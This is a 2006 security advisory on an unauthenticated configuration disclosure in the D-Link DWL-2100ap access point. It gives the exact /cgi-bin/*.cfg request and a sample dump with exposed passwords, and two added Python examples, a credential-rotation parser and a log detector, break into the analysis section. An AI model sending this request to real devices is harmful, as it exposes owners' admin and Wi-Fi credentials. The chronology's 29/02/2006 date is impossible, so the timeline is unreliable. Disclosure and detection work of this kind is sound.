INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY

http://www.intruders.com.br/
http://www.intruders.org.br/


ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)


PRIORITY: HIGH

I - INTRUDERS:
----------------



Intruders Tiger Team Security is a project affiliated with
Security Open Source (http://www.securityopensource.org.br).

The Intruders Tiger Team Security (ITTS) is a group of researchers
with more than 10 years of experience, specialized in the development
of intrusion projects (Pen-Test) and in special security projects.


All intrusion projects (Pen-Test) carried out to date by
the Intruders Tiger Team Security have been 100% successful.

II - INTRODUCTION:
------------------



D-Link AirPlus XtremeG 2.4GHz Wireless Access Point, 54Mbps/108Mbps (802.11g):

D-Link, the industry pioneer in wireless networking, introduces a performance
breakthrough in wireless connectivity: the D-Link AirPlus Xtreme G(TM) series of
high-speed devices now capable of delivering transfer rates up to 15x faster
than the standard 802.11b with the new D-Link 108G. With the new AirPlus Xtreme
G DWL-2100AP Wireless Access Point, D-Link sets a new standard for wireless access
points.

The D-Link DWL-2100ap is one of the most popular Access Points in the world.

III - DESCRIPTION:
------------------



During an intrusion project (Pen-Test), Intruders Tiger Team Security identified a
previously unknown vulnerability in the D-Link DWL-2100ap Access Point that allows an
attacker to read the device's configuration without authenticating to the web server.

Extremely sensitive information is available in the configuration of the
D-Link DWL-2100ap Access Point, for example:

- User and password used to manage the device.
- Password used in WEP and WPA.
- SSID, IP, subnet mask, MAC Address filters, etc.

IV - ANALYSIS:
---------------



Making an HTTP request for the /cgi-bin/ directory, the Web server returns error 404 (Page not found).

Making an HTTP request for /cgi-bin/AnyFile.htm, the Web server also returns error 404 (Page not found).

However, an HTTP request for any file name in the /cgi-bin/ directory with a .cfg extension
returns the entire device configuration.


For example, making the following request:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg

We would get a result equivalent to the following:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer 
Eth_Acl 
nameaddr
domainsuffix 
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr 
RADIUSport 1812
RADIUSsecret 
password IntrudersTest
passphrase 
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.

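For incident triage after such an exposure, the following added example (not code from the advisory or from D-Link) parses a dump in the "key value" layout shown above and lists which credential fields carried non-empty values and therefore must be rotated. The sample dump is constructed with placeholder values in the same layout; empty settings appear as a bare key, and an interface prefix such as "wlan1" is folded into the key name.

```python
import re

# Constructed sample in the layout of the dump quoted in the advisory;
# the values are placeholders, not a real device's configuration.
SAMPLE_DUMP = """\
# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
Eth_Acl
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
RADIUSaddr
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
"""

# Keys whose values are credentials; a non-empty exposed value must be rotated.
SECRET_KEYS = {"password", "passphrase", "radiussecret"}

# Interface prefixes that may precede a key (e.g. "wlan1 passphrase ...").
IFACE_RE = re.compile(r"(wlan|eth)\d+", re.IGNORECASE)


def parse_dump(text):
    """Return {key: value}. Comments are skipped, a trailing ':' on a key
    ("fwc: 34") is dropped, and "wlan1 passphrase X" becomes "wlan1.passphrase"."""
    cfg = {}
    for line in text.splitlines():
        line = line.rstrip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if len(parts) >= 2 and IFACE_RE.fullmatch(parts[0]):
            key = parts[0] + "." + parts[1]
            value = parts[2] if len(parts) == 3 else ""
        else:
            key = parts[0].rstrip(":")
            value = line[len(parts[0]):].strip()
        cfg[key] = value
    return cfg


def exposed_secrets(cfg):
    """Sorted names of credential keys that carry a non-empty value in the dump."""
    return sorted(k for k, v in cfg.items()
                  if k.split(".")[-1].lower() in SECRET_KEYS and v)
```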
The D-Link DWL-2100ap Access Point does not allow the Web server to be disabled, nor does it
offer any option to filter ports.

We also note that the D-Link DWL-2100ap Access Point ships with a default user /
password (user: admin and no password).



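Because the device offers no way to disable the Web server or filter ports, detection has to happen in front of it. The following added example (not part of the advisory) flags requests matching the /cgi-bin/<anything>.cfg pattern in Common Log Format lines; it assumes a proxy, IDS or sensor in front of the AP records HTTP requests in that format (the advisory does not say the device logs anything), and the log lines are constructed samples.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Common Log Format); not from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Feb/2006:10:01:02 -0300] "GET /index.htm HTTP/1.1" 200 1532
10.0.0.5 - - [11/Feb/2006:10:01:09 -0300] "GET /cgi-bin/ HTTP/1.1" 404 221
10.0.0.77 - - [11/Feb/2006:10:02:41 -0300] "GET /cgi-bin/Intruders.cfg HTTP/1.1" 200 2048
10.0.0.77 - - [11/Feb/2006:10:02:55 -0300] "GET /cgi-bin/x.CFG?v=1 HTTP/1.1" 200 2048
10.0.0.77 - - [11/Feb/2006:10:03:10 -0300] "GET /cgi-bin/a%2Ecfg HTTP/1.1" 200 2048
10.0.0.9 - - [11/Feb/2006:10:04:00 -0300] "GET /cgi-bin/AnyFile.htm HTTP/1.1" 404 221
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_cfg_probe(target: str) -> bool:
    """True when the request path is /cgi-bin/<anything>.cfg, the pattern the
    advisory describes; case, query string and percent-encoding are normalised
    so trivial variations of the request are not missed."""
    path = unquote(urlsplit(target).path).lower()
    return path.startswith("/cgi-bin/") and path.endswith(".cfg")


def find_cfg_leaks(log_text: str):
    """Return (ip, timestamp, target, status) for every matching request.
    A 200 status means the device most likely served its configuration."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_cfg_probe(m["target"]):
            hits.append((m["ip"], m["ts"], m["target"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, ts, target, status in find_cfg_leaks(SAMPLE_LOG):
        verdict = "CONFIG LEAKED" if status == 200 else "probe"
        print(f"{ts} {ip} {target} -> {status} ({verdict})")
```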
V. DETECTION:
-------------



Intruders Tiger Team Security confirmed the existence of this vulnerability in all firmware
versions tested, including the latest version, 2.10na.

Possibly other D-Link Access Point models are vulnerable as well.

VI. SUGGESTIONS:
--------------


D-Link company:


1 - Use strong session cookies to guarantee that only authorized users get access to the configuration.

2 - Store sensitive configuration values such as password(s) as hashes.

3 - Allow the creation of firewall policies and rules to filter port(s) and IP(s).

4 - Require the user to change the default user/password on first logon, and do not allow
the password to be changed back to the last one used.

5 - Use HTTP over SSL (HTTPS).

6 - Contract companies specialized in Pen-Test and security audit, in order to certify the
security of D-Link products.


D-Link customers:


1 - Upgrade the firmware of the D-Link DWL-2100ap Access Point.
Direct download link: http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp

VII - CHRONOLOGY:
-----------------



11/02/2006 - Vulnerability discovered during a Pen-Test.
15/02/2006 - D-Link World Wide Team contacted.
17/02/2006 - No response.
18/02/2006 - D-Link World Wide Team re-contacted.
24/02/2006 - No response.
25/02/2006 - D-Link World Wide Team last contact attempt.
29/02/2006 - No response.
29/02/2006 - D-Link Brazil Team contacted.
02/03/2006 - No response.
03/03/2006 - D-Link Brazil Team re-contacted.
06/03/2006 - D-Link Brazil Team responded.
09/03/2006 - Patch created.
14/03/2006 - Patch added to D-Link Brazil download site.
06/06/2006 - Advisory published.

VIII - CREDITS:
---------------



Wendel Guglielmetti Henrique and Intruders Tiger Team Security discovered this vulnerability.

Thanks to Glaudson Ocampos (Intruders Tiger Team Security), Waldemar Nehgme, João
Arquimedes (Security Open Source) and Ricardo N. Ferreira (Security Open Source).

Visit our website:

http://www.intruders.com.br/
http://www.intruders.org.br/